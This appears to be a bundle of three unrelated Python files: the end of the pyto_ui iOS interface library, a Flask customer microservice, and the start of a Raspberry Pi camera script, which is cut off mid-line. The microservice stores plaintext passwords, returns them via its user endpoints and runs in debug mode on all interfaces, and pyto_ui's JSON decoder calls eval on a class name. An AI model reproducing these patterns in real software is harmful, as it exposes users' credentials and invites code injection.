"title": self.title
}
if self.title_color is not None:
button["color"] = self.title_color.dictionary_representation()
if self.font is not None:
button["font"] = self.font.dictionary_representation()
if self.image is not None and isinstance(self.image, Image.Image):
button["image"] = self.image.filename
for key in list(globals().keys()).copy():
if key.startswith("BUTTON_TYPE_") and globals()[key] == self._button_type:
button["type"] = key.split("BUTTON_TYPE_")[1].lower()
r["Button"] = button
return r
@property
def title(self) -> str:
"""
The title of the button
:rtype: str
"""
title = self.__py_view__.title
if title is not None:
return str(title)
else:
return None
@title.setter
def title(self, new_value: str):
self.__py_view__.title = new_value
@property
def title_color(self) -> Color:
"""
The color of the title.
:rtype: pyto_ui.Color
"""
c = self.__py_view__.titleColor
if c is None:
return None
else:
return Color(c)
@title_color.setter
def title_color(self, new_value: Color):
if new_value is None:
self.__py_view__.titleColor = None
else:
self.__py_view__.titleColor = new_value.__py_color__
@property
def image(self) -> "Image.Image":
"""
The image displayed on the button. Can be a ``PIL`` image or an ``UIKit`` symbol image. For more information about symbols, see :func:`~pyto_ui.image_with_system_name`.
:rtype: PIL.Image.Image
"""
ui_image = self.__py_view__.image
if ui_image is None:
return None
elif ui_image.symbolImage:
return ui_image
else:
return __pil_image_from_ui_image__(ui_image)
_image = None
@image.setter
def image(self, new_value: "Image"):
if new_value is None:
self.__py_view__.image = None
self._image = None
elif "objc_class" in dir(new_value) and new_value.objc_class == UIImage:
self.__py_view__.image = new_value
else:
self._image = new_value
self.__py_view__.image = __ui_image_from_pil_image__(new_value)
@property
def font(self) -> Font:
"""
The font to be applied to the text.
:rtype: pyto_ui.Font
"""
py_font = self.__py_view__.font
if py_font is None:
return None
font = Font(None, None)
font.__ui_font__ = py_font
return font
@font.setter
def font(self, new_value: Font):
if new_value is None:
self.__py_view__.font = None
else:
self.__py_view__.font = new_value.__ui_font__
class TextField(Control):
"""
A field to type single line text.
The function passed to :data:`~pyto_ui.Control.action` will be called when the text field changes its text.
"""
def __init__(self, text: str = "", placeholder: str = None):
self.__py_view__ = __PyTextField__.newView()
self._setup_subclass()
self.__py_view__.managedValue = _values.value(self)
self.text = text
self.placeholder = placeholder
if callable(self.did_begin_editing):
self.__py_view__.didBeginEditing = _values.value(self.did_begin_editing)
if callable(self.did_end_editing):
self.__py_view__.didEndEditing = _values.value(self.did_end_editing)
def configure_from_dictionary(self, dictionary):
super().configure_from_dictionary(dictionary)
try:
dictionary = dictionary["TextView"]
except KeyError:
return
def get(key, _dict=dictionary, default=None):
return self._get(_dict, default)
self.placeholder = tuple(get("placeholder", default=""))
self.text = get("text", default="")
self.smart_quotes = get("smart_quotes", default=True)
self.smart_dashes = get("smart_dashes", default=True)
self.autocorrection = get("autocorrection", default=True)
self.secure = get("secure", default=False)
if get("color") is not None:
color = Color.__new__(Color)
color.configure_from_dictionary(get("color"))
self.text_color = color
if get("font") is not None:
font = Font.__new__(Font)
font.configure_from_dictionary(get("font"))
self.font = font
text_alignment = get("text_alignment")
if text_alignment is not None:
name = "TEXT_ALIGNMENT_"+(text_alignment.upper())
self.text_alignment = globals()[name]
keyboard_type = get("keyboard_type")
if keyboard_type is not None:
name = "KEYBOARD_TYPE_"+(keyboard_type.upper())
self.keyboard_type = globals()[name]
keyboard_appearance = get("keyboard_appearance")
if keyboard_appearance is not None:
name = "KEYBOARD_APPEARANCE__"+(keyboard_appearance.upper())
self.keyboard_appearance = globals()[name]
autocapitalization_type = get("autocapitalization_type")
if autocapitalization_type is not None:
name = "AUTO_CAPITALIZE_"+(autocapitalization_type.upper())
self.autocapitalization_type = globals()[name]
return_key_type = get("return_key_type")
if return_key_type is not None:
name = "RETURN_KEY_TYPE_"+(return_key_type.upper())
self.return_key_type = globals()[name]
border_style = get("border_style")
if border_style is not None:
name = "TEXT_FIELD_BORDER_STYLE_"+(border_style.upper())
self.border_style = globals()[name]
def dictionary_representation(self):
r = super().dictionary_representation()
text_field = {
"text": self.text,
"placeholder": self.placeholder,
"smart_quotes": self.smart_quotes,
"smart_dashes": self.smart_dashes,
"autocorrection": self.autocorrection,
"secure": self.secure
}
for key in list(globals().keys()).copy():
if key.startswith("KEYBOARD_TYPE_") and globals()[key] == self.keyboard_type:
text_field["keyboard_type"] = key.split("KEYBOARD_TYPE_")[1].lower()
for key in list(globals().keys()).copy():
if key.startswith("KEYBOARD_APPEARANCE__") and globals()[key] == self.keyboard_appearance:
text_field["keyboard_appearance"] = key.split("KEYBOARD_APPEARANCE__")[1].lower()
for key in list(globals().keys()).copy():
if key.startswith("AUTO_CAPITALIZE_") and globals()[key] == self.autocapitalization_type:
text_field["autocapitalization_type"] = key.split("AUTO_CAPITALIZE_")[1].lower()
for key in list(globals().keys()).copy():
if key.startswith("RETURN_KEY_TYPE_") and globals()[key] == self.return_key_type:
text_field["return_key_type"] = key.split("RETURN_KEY_TYPE_")[1].lower()
for key in list(globals().keys()).copy():
if key.startswith("TEXT_FIELD_BORDER_STYLE_") and globals()[key] == self.border_style:
text_field["border_style"] = key.split("TEXT_FIELD_BORDER_STYLE_")[1].lower()
for key in list(globals().keys()).copy():
if key.startswith("TEXT_ALIGNMENT_") and globals()[key] == self.text_alignment:
text_field["alignment"] = key.split("TEXT_ALIGNMENT_")[1].lower()
if self.text_color is not None:
text_field["color"] = self.text_color.dictionary_representation()
if self.font is not None:
text_field["font"] = self.font.dictionary_representation()
r["TextField"] = text_field
return r
@property
def border_style(self) -> TEXT_FIELD_BORDER_STYLE:
"""
The border style of the Text Field.
:rtype: TEXT_FIELD_BORDER_STYLE
"""
return self.__py_view__.borderStyle
@border_style.setter
def border_style(self, new_value: TEXT_FIELD_BORDER_STYLE):
self.__py_view__.borderStyle = new_value
@property
def did_begin_editing(self) -> Callable[[TextField], None]:
"""
A function called when the Text Field begins editing. Takes the sender Text Field as parameter.
:rtype: Callable[[TextField], None]
"""
action = self.__py_view__.didBeginEditing
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@did_begin_editing.setter
def did_begin_editing(self, new_value: Callable[[TextField], None]):
if new_value is None:
self.__py_view__.didBeginEditing = None
else:
self.__py_view__.didBeginEditing = _values.value(new_value)
@property
def did_end_editing(self) -> Callable[[TextField], None]:
"""
A function called when the Text Field ends editing. Takes the sender Text Field as parameter.
:rtype: Callable[[TextField], None]
"""
action = self.__py_view__.didEndEditing
if action is None:
return None
else:
return getattr(_values, str(action.identifier))
@did_end_editing.setter
def did_end_editing(self, new_value: Callable[[TextField], None]):
if new_value is None:
self.__py_view__.didEndEditing = None
else:
self.__py_view__.didEndEditing = _values.value(new_value)
@property
def text(self) -> str:
"""
The text contained in the Text Field.
:rtype: str
"""
return str(self.__py_view__.text)
@text.setter
def text(self, new_value: str):
self.__py_view__.text = new_value
@property
def placeholder(self) -> str:
"""
A gray text shown when there is no text.
:rtype: str
"""
return str(self.__py_view__.placeholder)
@placeholder.setter
def placeholder(self, new_value: str):
self.__py_view__.placeholder = new_value
@property
def text_color(self) -> Color:
"""
The color of the text displayed on screen.
:rtype: pyto_ui.Color
"""
c = self.__py_view__.textColor
if c is None:
return None
else:
return Color(c)
@text_color.setter
def text_color(self, new_value: Color):
if new_value is None:
self.__py_view__.textColor = None
else:
self.__py_view__.textColor = new_value.__py_color__
@property
def font(self) -> Font:
"""
The font of the text displayed on screen.
:rtype: pyto_ui.Font
"""
py_font = self.__py_view__.font
if py_font is None:
return None
font = Font(None, None)
font.__ui_font__ = py_font
return font
@font.setter
def font(self, new_value: Font):
if new_value is None:
self.__py_view__.font = None
else:
self.__py_view__.font = new_value.__ui_font__
@property
def text_alignment(self) -> TEXT_ALIGNMENT:
"""
The alignment of the text displayed on screen. See `Text Alignment <constants.html#text-alignment>`_ constants for possible values.
:rtype: `Text Alignment <constants.html#text-alignment>`_
"""
return self.__py_view__.textAlignment
@text_alignment.setter
def text_alignment(self, new_value: TEXT_ALIGNMENT):
self.__py_view__.textAlignment = new_value
@property
def smart_dashes(self) -> bool:
"""
A boolean indicating whether smart dashes are enabled.
:rtype: bool
"""
return self.__py_view__.smartDashes
@smart_dashes.setter
def smart_dashes(self, new_value: bool):
self.__py_view__.smartDashes = new_value
@property
def smart_quotes(self) -> bool:
"""
A boolean indicating whether smart quotes are enabled.
:rtype: bool
"""
return self.__py_view__.smartQuotes
@smart_quotes.setter
def smart_quotes(self, new_value: bool):
self.__py_view__.smartQuotes = new_value
@property
def keyboard_type(self) -> KEYBOARD_TYPE:
"""
The type of keyboard to use while editing the text. See `Keyboard Type <constants.html#keyboard-type>`_ constants for possible values.
:rtype: `Keyboard Type <constants.html#keyboard-type>`_
"""
return self.__py_view__.keyboardType
@keyboard_type.setter
def keyboard_type(self, new_value: KEYBOARD_TYPE):
self.__py_view__.keyboardType = new_value
@property
def autocapitalization_type(self) -> AUTO_CAPITALIZE:
"""
The type of autocapitalization to use while editing th text. See `Auto Capitalization <constants.html#auto-capitalization>`_ constants for possible values.
:rtype: `Auto Capitalization <constants.html#auto-capitalization>`_
"""
return self.__py_view__.autocapitalizationType
@autocapitalization_type.setter
def autocapitalization_type(self, new_value: AUTO_CAPITALIZE):
self.__py_view__.autocapitalizationType = new_value
@property
def autocorrection(self) -> bool:
"""
A boolean indicating whether autocorrection is enabled.
:rtype: bool
"""
return self.__py_view__.autocorrection
@autocorrection.setter
def autocorrection(self, new_value: bool):
self.__py_view__.autocorrection = new_value
@property
def keyboard_appearance(self) -> KEYBOARD_APPEARANCE:
"""
The appearance of the keyboard used while editing the text. See `Keyboard Appearance <constants.html#keyboard-appearance>`_ constants for possible values.
:rtype: `Keyboard Appearance <constants.html#keyboard-appearance>`_
"""
return self.__py_view__.keyboardAppearance
@keyboard_appearance.setter
def keyboard_appearance(self, new_value: KEYBOARD_APPEARANCE):
self.__py_view__.keyboardAppearance = new_value
@property
def return_key_type(self) -> RETURN_KEY_TYPE:
"""
The type of return key to show on the keyboard used to edit the text. See `Return Key Type <constants.html#return-key-type>`_ constants for possible values.
:rtype: `Return Key Type <constants.html#return-key-type>`_
"""
return self.__py_view__.returnKeyType
@return_key_type.setter
def return_key_type(self, new_value: RETURN_KEY_TYPE):
self.__py_view__.returnKeyType = new_value
@property
def secure(self) -> bool:
"""
A boolean indicating whether the keyboard should be configured to enter sensitive data. The text entered by the user will be hidden.
:rtype: bool
"""
return self.__py_view__.isSecureTextEntry
@secure.setter
def secure(self, new_value: bool):
self.__py_view__.isSecureTextEntry = new_value
##################
# MARK: - Serialization
##################
def _from_json(obj):
if "class" in obj and isinstance(obj["class"], str):
full_class_name = obj["class"]
if "." in full_class_name:
parts = full_class_name.split(".")
class_name = parts[-1]
del parts[-1]
module = ".".join(parts)
klass = getattr(sys.modules[module], class_name)
else:
try:
klass = getattr(sys.modules["__main__"], full_class_name)
except AttributeError:
klass = globals()[full_class_name]
if klass is None:
klass = eval(full_class_name)
view = klass.__new__(klass)
view.configure_from_dictionary(obj)
return view
else:
return obj
class Encoder(json.JSONEncoder):
def default(self, o):
return o.dictionary_representation()
class Decoder(json.JSONDecoder):
def __init__(self):
super().__init__(object_hook=_from_json)
###################
# MARK: - Functions
###################
def font_family_names() -> List[str]:
"""
Returns all font family names that can be used to initialize a font.
:rtype: List[str]
"""
names = __UIFont__.familyNames
py_names = []
for name in names:
py_names.append(str(name))
return py_names
def image_with_system_name(name: str) -> UIImage:
"""
Returns a system symbol image from given name. The return value is an UIKit ``UIImage`` object, so it can only be used on the ``pyto_ui`` library.
More info about symbols on `Apple's Web Site <https://developer.apple.com/design/resources/>`_ .
:param name: The name of the SF Symbol.
:rtype: UIImage
"""
check(name, "name", [str])
image = UIImage.systemImageNamed(name, withConfiguration=None)
if image is None:
raise ValueError("The given symbol name is not valid.")
return image
def show_view(view: View, mode: PRESENTATION_MODE):
"""
Presents the given view.
This function doesn't return until the view is closed. You can use another thread to perform background tasks and modify the UI after it's presented.
On iPad, if the view has a custom size, it will be used for the presentation.
:param view: The :class:`~pyto_ui.View` object to present.
:param mode: The presentation mode to use. The value will be ignored on a widget. See `Presentation Mode <constants.html#presentation-mode>`_ constants for possible values.
"""
check(view, "view", [View])
check(mode, "mode", [int])
def show(view, mode):
view.__py_view__.presentationMode = mode
try:
ConsoleViewController.showView(
view.__py_view__,
onConsoleForPath=threading.current_thread().script_path,
)
except AttributeError:
ConsoleViewController.showView(view.__py_view__, onConsoleForPath=None)
while view.__py_view__.isPresented:
sleep(0.2)
if (
"__editor_delegate__" in dir(builtins)
and builtins.__editor_delegate__ is not None
):
global show_view
_show_view = show_view
show_view = show
try:
builtins.__editor_delegate__.show_ui(view, mode)
return
except NotImplementedError:
pass
finally:
show_view = _show_view
show(view, mode)
def show_view_controller(view_controller: "UIViewController"):
"""
Shows an UIKit View Controller. This function must be called from the main thread.
See `Objective-C <Objective-C.html>`_ and `mainthread <mainthread.html>`_.
:param view_controller: UIViewController.
"""
if not NSThread.currentThread.isMainThread:
raise RuntimeError(
"'show_view_controller' must be called from the app's main thread. See the 'mainthread' module."
)
try:
ConsoleViewController.showVC(
view_controller, onConsoleForPath=threading.current_thread().script_path
)
except AttributeError:
ConsoleViewController.showVC(view_controller, onConsoleForPath=None)
def pick_color() -> Color:
"""
Picks a color with the system color picker and returns it.
Requires iOS 14.
:rtype: pyto_ui.Color
"""
UIDevice = ObjCClass("UIDevice")
if (
UIDevice is not None
and float(str(UIDevice.currentDevice.systemVersion).split(".")[0]) < 14
):
raise NotImplementedError("The color picker requires iOS 14.")
script_path = None
try:
script_path = threading.current_thread().script_path
except AttributeError:
pass
color = ConsoleViewController.pickColorWithScriptPath(script_path)
if color is None:
return None
else:
return Color(color)
def pick_font(size: float = None) -> Font:
"""
Picks a font with the system font picker and returns it.
:rtype: pyto_ui.Font
"""
check(size, "size", [float, int, None])
script_path = None
try:
script_path = threading.current_thread().script_path
except AttributeError:
pass
font = ConsoleViewController.pickFontWithScriptPath(script_path)
if font is None:
return None
else:
pyFont = Font("", 0)
pyFont.__ui_font__ = font
if size is not None:
pyFont = pyFont.with_size(size)
return pyFont
# MARK: - Toga
if "sphinx" in sys.modules:
iOSBox = object
class toga:
class Box:
pass
class _PytoBox(iOSBox):
def __init__(self, view, interface):
self.pyto_view = view
super().__init__(interface=interface)
def create(self):
self.native = self.pyto_view.__py_view__.managed
# Add the layout constraints
self.add_constraints()
class TogaWidget(toga.Box):
"""
A Toga Widget created from a PytoUI view.
Pass a :class:`~pyto_ui.View` as the first parameter of the initializer.
"""
def __init__(self, view: View, id=None, style=None, children=None, factory=None):
super().__init__(id=id, style=style, factory=factory)
self._children = []
if children:
self.add(*children)
# Create a platform specific implementation of a Box
self._impl = _PytoBox(view=view, interface=self)
|
customer.py
|
'''
Customer Service. Provides Customer API as described on def index()
2018 Ayhan AVCI.
mailto: ayhanavci@gmail.com
https://lain.run
https://github.com/ayhanavci/
'''
from flask import Flask
from flask import request
from flask import json
from flask import jsonify
import redis
import requests
import os
import pika
import threading
import datetime
import uuid
import asyncio
app = Flask(__name__)
redis_db = redis.StrictRedis(host=os.environ["DATABASE_IP"],
password=os.environ["DATABASE_PASSWORD"],
port=os.environ["DATABASE_PORT"],
db=0)
@app.route('/', methods=['GET'])
def index():
services = {
"login-user": {
"UserName": "String",
"Password": "String"
},
"add-user": {
"UserName": "String",
"Password": "String",
"FullName": "String",
"Email": "String",
"Credit": "String"
},
"update-user": {
"UserName": "String",
"Password": "String",
"FullName": "String",
"Email": "String",
"Credit": "String"
},
"get-user": {
"UserName": "String"
},
"get-all-users": {
},
"get-credit": {
"UserName": "String"
},
"set-credit": {
"UserName": "String",
"Credit": "String"
}
}
return jsonify(services=services), 200
@app.route('/login-user/', methods=['POST'])
def login_user():
user_name = request.json['UserName']
password = request.json['Password']
result = { "Status": "Success"}
if not redis_db.exists(user_name):
result = { "Status": "User Not Found"}
else:
print(redis_db.get(user_name))
user_data = json.loads(redis_db.get(user_name))
if user_data['Password'] != password:
result = { "Status": "Wrong password"}
return jsonify(result=result), 200
@app.route('/add-user/', methods=['POST'])
def add_user():
user_name = request.json['UserName']
if redis_db.exists(user_name):
result = { "Status": "User already exists"}
else:
store_data = {}
store_data['Action'] = "Add New Customer"
store_data['UserName'] = request.json['UserName']
store_data['FullName'] = request.json['FullName']
store_data['Password'] = request.json['Password']
store_data['Email'] = request.json['Email']
store_data['Credit'] = request.json['Credit']
send_event_store_data("add_customer", store_data)
result = { "Status": "Success"}
return jsonify(result=result), 200
@app.route('/update-user/', methods=['POST'])
def update_user():
user_name = request.json['UserName']
if not redis_db.exists(user_name):
result = { "Status": "User not found"}
else:
user_data = json.loads(redis_db.get(user_name))
store_data = {}
store_data['Action'] = "Update Customer"
store_data['UserName'] = request.json['UserName']
store_data['FullName'] = request.json['FullName']
store_data['Password'] = request.json['Password']
store_data['Email'] = request.json['Email']
store_data['Credit'] = user_data['Credit'] #Preserve credit
send_event_store_data("update_customer", store_data)
print("update_user:{0}".format(store_data['Action']))
result = { "Status": "Success"}
return jsonify(result=result), 200
@app.route('/set-credit/', methods=['POST'])
def set_credit():
user_name = request.json['UserName']
result = { "Status": "Success"}
if not redis_db.exists(user_name):
result = { "Status": "User not found"}
else:
user_data = json.loads(redis_db.get(user_name))
store_data = {}
store_data['Action'] = "Set Credit"
store_data['UserName'] = user_data['UserName']
store_data['FullName'] = user_data['FullName']
store_data['Password'] = user_data['Password']
store_data['Email'] = user_data['Email']
store_data['Credit'] = request.json['Credit'] #Only update credit
send_event_store_data("set_credit", store_data)
return jsonify(result="result"), 200
@app.route('/get-credit/', methods=['GET'])
def get_credit():
user_name = request.json['UserName']
result = { "Status": "Error"}
if not redis_db.exists(user_name):
result = { "Status": "User not found"}
else:
user_data = json.loads(redis_db.get(user_name))
app.logger.info('get-credit: %s', user_data)
result = { "Status": "Success", "Credit": user_data['Credit']}
return jsonify(result=result), 200
@app.route('/get-user/<user_name>', methods=['GET'])
def get_user(user_name):
if not redis_db.exists(user_name):
result = { "Status": "User not found"}
else:
user_data = json.loads(redis_db.get(user_name))
result = { "Status": "Success", "User Info": user_data }
return jsonify(result=result), 200
@app.route('/get-all-users/', methods=['GET'])
def get_all_users():
if redis_db.keys().__len__() == 0:
result = { "Status": "No User Found"}
else:
user_data = []
for user_name in redis_db.keys():
user_data.append(json.loads(redis_db.get(user_name)))
result = { "Status": "Success", "Users": user_data }
return jsonify(result=result), 200
def event_add_new_customer(user_data):
event_set_user_data(user_data)
print("event_add_new_customer - {0}".format(user_data))
def event_update_customer(user_data):
event_set_user_data(user_data)
print("event_update_customer - {0}".format(user_data))
def event_set_credit(user_data):
event_set_user_data(user_data)
print("event_set_credit - {0}".format(user_data))
def event_new_order_placed(message):
print(message)
message_json = json.loads(message)
data_json = json.loads(message_json['Data'])
user_data = json.loads(redis_db.get(data_json['CustomerId']))
app.logger.info('event_new_order_placed: %s', user_data)
result = { "OrderID": data_json['OrderID'], "Credit":user_data['Credit'] }
send_order_saga_data("CreditInfo", json.dumps(result))
def event_order_finalized(message):
print("event_order_finalized:" + message)
message_json = json.loads(message)
data_json = json.loads(message_json['Data'])
user_data = json.loads(redis_db.get(data_json['CustomerId']))
print("event_order_finalized: Customer:" + data_json['CustomerId'])
credit = user_data['Credit']
price = data_json['Price']
final_credit = 0 if float(credit) - float(price) < 0 else float(credit) - float(price)
user_data['Credit'] = final_credit
redis_db.set(data_json['CustomerId'], json.dumps(user_data))
redis_db.save()
def event_set_user_data(user_data):
local_data = {}
local_data['UserName'] = user_data['UserName']
local_data['FullName'] = user_data['FullName']
local_data['Password'] = user_data['Password']
local_data['Email'] = user_data['Email']
local_data['Credit'] = user_data['Credit']
redis_db.set(local_data['UserName'], json.dumps(local_data))
redis_db.save()
bus_user_name = os.environ["EVENT_BUS_USERNAME"]
bus_password = os.environ["EVENT_BUS_PASSWORD"]
bus_hostname = os.environ["EVENT_BUS_IP"]
credentials = pika.PlainCredentials(username=bus_user_name, password=bus_password)
parameters = pika.ConnectionParameters(bus_hostname, 5672, '/', credentials)
connection = pika.BlockingConnection(parameters)
#Event Bus Addressing
send_queue_name = "msdemo_queue_event_store"
send_exchange_name = "msdemo_exchange_event_store"
send_routing_key = "msdemo_routingkey_event_store"
receive_queue_name = "msdemo_queue_customer"
receive_exchange_name = "msdemo_exchange_customer"
receive_routing_key = "msdemo_routingkey_customer"
exchange_name_order = "msdemo_exchange_order"
saga_exchange_name_order = "msdemo_exchange_saga_order"
saga_routing_key_order = "msdemo_routingkey_saga_order"
saga_routing_key_orderresponse = "msdemo_routingkey_saga_orderresponse"
def listener_callback(ch, method, properties, body):
response_json = json.loads(body)
print("Listener Callback Key:{0} Json:{1}".format(method.routing_key, response_json))
if (method.routing_key == receive_routing_key):
if (response_json['Data']['Action'] == "Add New Customer"):
event_add_new_customer(response_json['Data'])
elif (response_json['Data']['Action'] == "Update Customer"):
event_update_customer(response_json['Data'])
elif (response_json['Data']['Action'] == "Set Credit"):
event_set_credit(response_json['Data'])
elif (method.routing_key == saga_routing_key_order):
print("Processing Order Placed. Event:{0}".format(response_json['Event']))
if (response_json['Event'] == "OrderPlaced"):
event_new_order_placed(response_json['Data'])
elif (response_json['Event'] == "OrderFinalized"):
event_order_finalized(response_json['Data'])
def init_event_bus():
threading.Thread(target=start_listener).start()
start_sender()
def start_listener():
#Receive from Event Store
receive_channel = connection.channel()
receive_channel.exchange_declare(exchange=receive_exchange_name, exchange_type='direct')
receive_channel.exchange_declare(exchange=saga_exchange_name_order, exchange_type='direct')
receive_channel.queue_declare(
queue=receive_queue_name,
durable=True,
exclusive=False,
auto_delete=False,
arguments=None)
receive_channel.queue_bind(exchange=receive_exchange_name,
queue=receive_queue_name,
routing_key=receive_routing_key)
receive_channel.queue_bind(exchange=saga_exchange_name_order,
queue=receive_queue_name,
routing_key=saga_routing_key_order)
receive_channel.basic_qos(prefetch_size=0, prefetch_count=1)
receive_channel.basic_consume(listener_callback, queue=receive_queue_name, no_ack=True)
receive_channel.start_consuming()
send_channel = connection.channel()
def start_sender():
#Send to Event Store
send_channel.exchange_declare(exchange=send_exchange_name, exchange_type='direct')
send_channel.exchange_declare(exchange=send_exchange_name, exchange_type='direct')
send_channel.queue_declare(queue=send_queue_name, durable=True, exclusive=False, auto_delete=False, arguments=None)
send_channel.queue_bind(queue=send_queue_name, exchange=send_exchange_name, routing_key=send_routing_key)
def send_event_store_data(event_type, data):
item = {}
item_data = {}
item["Aggregate"] = "Customer"
item["Topic"] = "msdemo_topic.customer.{0}".format(event_type)
item["Timestamp"] = datetime.datetime.now().strftime("%d/%m/%Y %H:%M:%S:%f")
item["Version"] = "1.0"
item["BUS_ExchangeName"] = receive_exchange_name
item["BUS_Queue"] = receive_queue_name
item["BUS_RoutingKey"] = receive_routing_key
item["Data"] = data
message = json.dumps(item)
print(message)
try:
send_channel.basic_publish(exchange=send_exchange_name,
routing_key=send_routing_key,
body=message,
properties=pika.BasicProperties(
delivery_mode = 2, # make message persistent
))
except pika.exceptions.ConnectionClosed:
print("send_event_store_data Exception. Connection closed")
except:
print("send_event_store_data Exception")
def send_order_saga_data(event_type, data):
print("send_order_saga_data type:{0} data:{1}".format(event_type, data))
item = {}
item_data = {}
item["Event"] = event_type
item["Data"] = data
message = json.dumps(item)
print(message)
try:
send_channel.basic_publish(exchange=exchange_name_order,
routing_key=saga_routing_key_orderresponse,
body=message,
properties=pika.BasicProperties(
delivery_mode = 2, # make message persistent
))
except pika.exceptions.ConnectionClosed:
print("send_order_saga_data Exception. Connection closed")
except:
print("send_order_saga_data Exception")
if __name__ == "__main__":
init_event_bus()
app.run(port=80, host="0.0.0.0", debug=True)
|
cam.py
|
#!/usr/bin/python
# Version: 2.1 (see ChangeLog.md for a list of changes)
# -------------------------------------------------------------------------------
# Header from original version:
# Point-and-shoot camera for Raspberry Pi w/camera and Adafruit PiTFT.
# This must run as root (sudo python cam.py) due to framebuffer, etc.
#
# Adafruit invests time and resources providing this open source code,
# please support Adafruit and open-source development by purchasing
# products from Adafruit, thanks!
#
# http://www.adafruit.com/products/998 (Raspberry Pi Model B)
# http://www.adafruit.com/products/1367 (Raspberry Pi Camera Board)
# http://www.adafruit.com/products/1601 (PiTFT Mini Kit)
# This can also work with the Model A board and/or the Pi NoIR camera.
#
# Prerequisite tutorials: aside from the basic Raspbian setup and
# enabling the camera in raspi-config, you should configure WiFi (if
# using wireless with the Dropbox upload feature) and read these:
# PiTFT setup (the tactile switch buttons are not required for this
# project, but can be installed if you want them for other things):
# http://learn.adafruit.com/adafruit-pitft-28-inch-resistive-touchscreen-display-raspberry-pi
# Dropbox setup (if using the Dropbox upload feature):
# http://raspi.tv/2013/how-to-use-dropbox-with-raspberry-pi
#
# Written by Phil Burgess / Paint Your Dragon for Adafruit Industries.
# BSD license, all text above must be included in any redistribution.
# -------------------------------------------------------------------------------
# -------------------------------------------------------------------------------
# Changes from the original version by Bernhard Bablok (mail a_t bablokb dot de)
# Tested with picamera 1.8.
# -------------------------------------------------------------------------------
import atexit
import cPickle as pickle
import errno
import fnmatch
import io
import sys
import os
import os.path
import pwd
import picamera
import pyexiv2
import pygame
import stat
import threading
import time
from pygame.locals import *
from subprocess import call
# Class encapsulating constants --------------------------------------------
class Mode:
UNDEFINED = -1
PLAYBACK = 0
DELETE = 1
NO_IMAGES = 2
VIEWFINDER = 3
STORAGE = 4
SIZE = 5
EFFECT = 6
ISO = 7
AWB = 8
QUALITY = 9
QUIT = 10
LAST = QUIT # LAST must be equal to the highest mode
# UI classes ---------------------------------------------------------------
# Small resistive touchscreen is best suited to simple tap interactions.
# Importing a big widget library seemed a bit overkill. Instead, a couple
# of rudimentary classes are sufficient for the UI elements:
# Icon is a very simple bitmap class, just associates a name and a pygame
# image (PNG loaded from icons directory) for each.
# There isn't a globally-declared fixed list of Icons. Instead, the list
# is populated at runtime from the contents of the 'icons' directory.
class Icon:
def __init__(self, name):
self.name = name
try:
self.bitmap = pygame.image.load(iconPath + '/' + name + '.png')
except:
pass
# Button is a simple tappable screen region. Each has:
# - bounding rect ((X,Y,W,H) in pixels)
# - optional background color and/or Icon (or None), always centered
# - optional foreground Icon, always centered
# - optional single callback function
# - optional single value passed to callback
# Occasionally Buttons are used as a convenience for positioning Icons
# but the taps are ignored. Stacking order is important; when Buttons
# overlap, lowest/first Button in list takes precedence when processing
# input, and highest/last Button is drawn atop prior Button(s). This is
# used, for example, to center an Icon by creating a passive Button the
# width of the full screen, but with other buttons left or right that
# may take input precedence (e.g. the Effect labels & buttons).
# After Icons are loaded at runtime, a pass is made through the global
# buttons[] list to assign the Icon objects (from names) to each Button.
class Button:
def __init__(self, rect, **kwargs):
self.rect = rect # Bounds
self.color = None # Background fill color, if any
self.iconBg = None # Background Icon (atop color fill)
self.iconFg = None # Foreground Icon (atop background)
self.bg = None # Background Icon name
self.fg = None # Foreground Icon name
self.callback = None # Callback function
self.value = None # Value passed to callback
for key, value in kwargs.iteritems():
if key == 'color': self.color = value
elif key == 'bg' : self.bg = value
elif key == 'fg' : self.fg = value
elif key == 'cb' : self.callback = value
elif key == 'value': self.value = value
def selected(self, pos):
x1 = self.rect[0]
y1 = self.rect[1]
x2 = x1 + self.rect[2] - 1
y2 = y1 + self.rect[3] - 1
if ((pos[0] >= x1) and (pos[0] <= x2) and
(pos[1] >= y1) and (pos[1] <= y2)):
if self.callback:
if self.value is None: self.callback()
else: self.callback(self.value)
return True
return False
def draw(self, screen):
if self.color:
screen.fill(self.color, self.rect)
if self.iconBg:
screen.blit(self.iconBg.bitmap,
(self.rect[0]+(self.rect[2]-self.iconBg.bitmap.get_width())/2,
self.rect[1]+(self.rect[3]-self.iconBg.bitmap.get_height())/2))
if self.iconFg:
screen.blit(self.iconFg.bitmap,
(self.rect[0]+(self.rect[2]-self.iconFg.bitmap.get_width())/2,
self.rect[1]+(self.rect[3]-self.iconFg.bitmap.get_height())/2))
def setBg(self, name):
if name is None:
self.iconBg = None
else:
for i in icons:
if name == i.name:
self.iconBg = i
break
# UI callbacks -------------------------------------------------------------
# These are defined before globals because they're referenced by items in
# the global buttons[] list.
def isoCallback(n): # Pass 1 (next ISO) or -1 (prev ISO)
global isoMode
setIsoMode((isoMode + n) % len(isoData))
def awbCallback(n): # Pass 1 (next AWB) or -1 (prev AWB)
global awbMode
setAwbMode((awbMode + n) % len(awbData))
def settingCallback(n): # Pass 1 (next setting) or -1 (prev setting)
global screenMode
screenMode += n
if screenMode <= Mode.VIEWFINDER: screenMode = len(buttons) - 1
elif screenMode >= len(buttons): screenMode = Mode.VIEWFINDER + 1
def fxCallback(n): # Pass 1 (next effect) or -1 (prev effect)
global fxMode
setFxMode((fxMode + n) % len(fxData))
def quitCallback(): # Quit confirmation button
saveSettings()
raise SystemExit
def viewCallback(n): # Viewfinder buttons
global imgNums, loadIdx, imgSurface, screenMode, screenModePrior, settingMode, storeMode
if n is 0: # Gear icon (settings)
screenMode = settingMode # Switch to last settings mode
elif n is 1: # Play icon (image playback)
if imgSurface: # Last photo is already memory-resident
loadIdx = len(imgNums)-1
screenMode = Mode.PLAYBACK
screenModePrior = Mode.UNDEFINED
else: # Load image
if len(imgNums):
loadIdx = len(imgNums)-1
showImage(loadIdx)
else: screenMode = Mode.NO_IMAGES
else: # Rest of screen = shutter
takePicture()
def doneCallback(): # Exit settings
global screenMode, settingMode
if screenMode > Mode.VIEWFINDER:
settingMode = screenMode
saveSettings()
screenMode = Mode.VIEWFINDER
def imageCallback(n): # Pass 1 (next image), -1 (prev image) or 0 (delete)
global screenMode
if n is 0:
screenMode = Mode.DELETE
else:
showNextImage(n)
def deleteCallback(n): # Delete confirmation
global loadIdx, imgNums, imgSurface, screenMode, storeMode
screenMode = Mode.PLAYBACK
screenModePrior = Mode.UNDEFINED
if n is True:
os.remove(pathData[storeMode] +
